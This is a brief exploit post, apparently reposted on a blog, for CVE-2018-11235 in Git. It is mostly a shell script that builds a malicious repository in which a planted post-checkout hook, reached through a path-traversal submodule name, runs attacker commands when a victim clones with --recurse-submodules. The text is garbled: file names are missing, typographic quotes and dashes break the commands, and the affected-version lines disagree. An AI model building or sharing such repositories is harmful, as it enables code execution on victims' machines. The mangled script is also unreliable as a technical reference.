Git < 2.17.1 - Remote Code Execution

# Exploit Title: Git (code execution)
# Date: 2018-05-29
# Exploit Author: JameelNabbo
# Website: <>
# Vendor Homepage: <>
# CVE: CVE-2018-11235
#Version: <=2.17.1
# Tested on Kali Linux


Create two files: the file which will contain our commands to be executed the fole which contain a normal build with a bit of calls to our file

add the follwing to
cat << EOF

#here we can put our lovely commands
Exploited! : $(ifconfig)



Add the follwing to file:

set -e

#change it to any other Repo

git init “$repo_dir”
cd “$repo_dir”
git submodule add “$repo_submodule” pwned
mkdir modules
cp -r .git/modules/pwned modules
cp ../ modules/pwned/hooks/post-checkout
git config -f .gitmodules submodule.pwned.update checkout
git config -f .gitmodules –rename-section submodule.pwned submodule…/../modules/pwned
git add modules
git submodule add “$repo_submodule”
git add SmartWorm
git commit -am pwned
echo “All done, now \`git clone –recurse-submodules \”$repo_dir\” dest_dir\`”


Please follow and like us: